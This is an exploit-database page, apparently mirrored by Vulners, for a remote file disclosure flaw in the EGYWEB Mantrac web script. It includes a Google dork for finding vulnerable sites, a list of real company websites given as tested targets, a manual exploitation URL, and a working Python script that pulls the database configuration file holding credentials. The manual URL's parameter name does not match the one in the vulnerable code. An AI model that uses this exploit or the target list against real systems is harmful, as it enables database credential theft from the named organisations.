Vulners
Lucene search
EGYWEB (Mantrac) <= Remote File Disclosure Exploit
EGYWEB (Mantrac) <= Remote File Disclosure Exploit (.py)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact (onlymail) : [email protected]
[~] (.py) Exploit Coded by : B3mB4m
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
[~] Special Thankz: 1337day.com
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : EGYWEB
|~Affected Version : Mantrac Script
|~Software : www.egyweb.com
|~RISK : Medium
|~Google Keyword/Dork : "Created by EGYWEB" | "EGYWEB" inurl:index.php?pg= | inurl:360download.php
|~Tested On : [L] Kali Linux \ Mozilla Firefox \ Arora \ [R) ALL example sites.
####################INFO################################
database passwords can be drawn.
### Error Line in '360download.php' ##
..
..
$file_name=$_REQUEST['file_name'];
download($file_name);
?>
########################################################
Example and tested on;
http://www.deltagroup.com.eg
http://www.mantracvostok.ru
http://www.mantracghana.com
http://www.mantracnigeria.com
http://www.mantrackenya.com
http://www.mantractanzania.com
http://www.unatrac.com
http://www.iratrac.com
http://www.iratrac.iq
http://www.unatrac.com
http://www.mantracvostok.com
http://www.mantrac-sl.com
http://www.mantracuganda.com
http://www.mantracegypt.com
http://www.quest.com.eg
http://www.delta-ghana.com
http://www.delta-tanzania.com
http://www.pyramidscapital.com/eng/
############################################################
Manual Exploitation; http://$VICTIM/360download.php?filename=[LOCAL FILE]
############################################################
=========Automatic "db_connector.php" File Disclosure Exploit ========
##################### exploit.py in ##############################
import urllib
def master():
print """
########################################################
EGYWEB <= Remote File Disclosure Vulnerability (.py)
Automatic "db_connector.php" File Disclosure Exploit
Researched by KnocKout
Exploit Coded by B3mB4m
Website: http://h4x0resec.blogspot.com / h4x0re Security
============
How to use :
python exploit.py
Target : http://VICTIM.com
Target : http://VICTIM.com/path
That's it ! Happy END !
#################################################
"""
class KnocKout:
def __init__(self):
self.ask = raw_input("Target : ")
def exploit(self):
self.rename = self.ask.replace("http://", "") + ".php"
try:
urllib.urlretrieve(self.ask+"/360download.php?file_name=classes/db_connector.php", self.rename)
print "Finish ! Config --> %s " % (self.rename)
except:
print "This website have a security sorry ! ";
if __name__ == '__main__':
master()
op = KnocKout()
op.exploit()
# 0day.today [2018-01-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Sep 2014 00:00Current
7.1High risk
Vulners AI Score7.1